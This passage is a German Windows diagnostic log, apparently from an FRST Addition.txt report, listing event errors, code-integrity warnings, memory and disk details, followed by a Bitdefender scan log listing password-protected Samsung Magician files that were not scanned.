Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/19/2017 01:54:14 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/19/2017 01:51:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x33fc
Startzeit der fehlerhaften Anwendung: 0x01d2d0963aa49603
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 5e8a5ef4-440c-434d-91c0-338b626dcfb0
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/18/2017 09:09:27 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/18/2017 09:09:09 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/18/2017 09:06:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x2304
Startzeit der fehlerhaften Anwendung: 0x01d2d009d6f7143d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 3df2ca2e-39a1-4eeb-abcd-e899ccd508a4
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/17/2017 09:21:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1b10
Startzeit der fehlerhaften Anwendung: 0x01d2cf42c69a45ef
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ea7d32bf-5e80-458b-9d7a-442387dd0ab9
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/17/2017 09:14:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/17/2017 09:11:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1894
Startzeit der fehlerhaften Anwendung: 0x01d2cf4162996d04
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4380628c-e8f1-4062-8c7c-6a315d1a7271
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Systemfehler:
=============
Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/19/2017 01:51:19 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/18/2017 09:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/17/2017 09:21:25 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "SDWSCService" wurde aufgrund folgenden Fehlers nicht gestartet:
Ein erforderliches Zertifikat befindet sich nicht im Gültigkeitszeitraum gemessen an der aktuellen Systemzeit oder dem Zeitstempel in der signierten Datei.
Error: (05/17/2017 09:21:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (05/17/2017 09:21:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (05/17/2017 09:11:28 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
CodeIntegrity:
===================================
Date: 2017-05-19 14:42:06.322
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-19 14:42:06.321
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-19 14:42:06.311
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-19 14:42:06.309
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-19 14:24:55.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-19 13:56:04.713
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-19 13:51:23.446
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-19 13:51:23.415
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-18 22:49:46.723
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-18 22:49:46.684
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00119_011\avcuf64.dll that did not meet the Microsoft signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5651.35 MB
Summe virtueller Speicher: 14271.12 MB
Verfügbarer virtueller Speicher: 11138.57 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:237.69 GB) (Free:109.28 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
Code:
ATTFilter BitDefender Log File
Product : Bitdefender Internet Security 2017
Scanning task : Vollständiger System-Scan
Log date : Freitag, 19. Mai 2017 15:18:56
Log path : C:\ProgramData\Bitdefender\Desktop\Profiles\Logs\dcf483c4-26d0-4e6f-ba28-6a53a00adae1\1495198083_1_01.xml
Scan Paths:
Path : C:\
Path : D:\
[-]Scan Results
[-]Objects that were not scanned:
Object Path
Reason
Final Status
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Help.pdf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/RELEASE_NOTES.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/install.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/LIMITATIONS.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
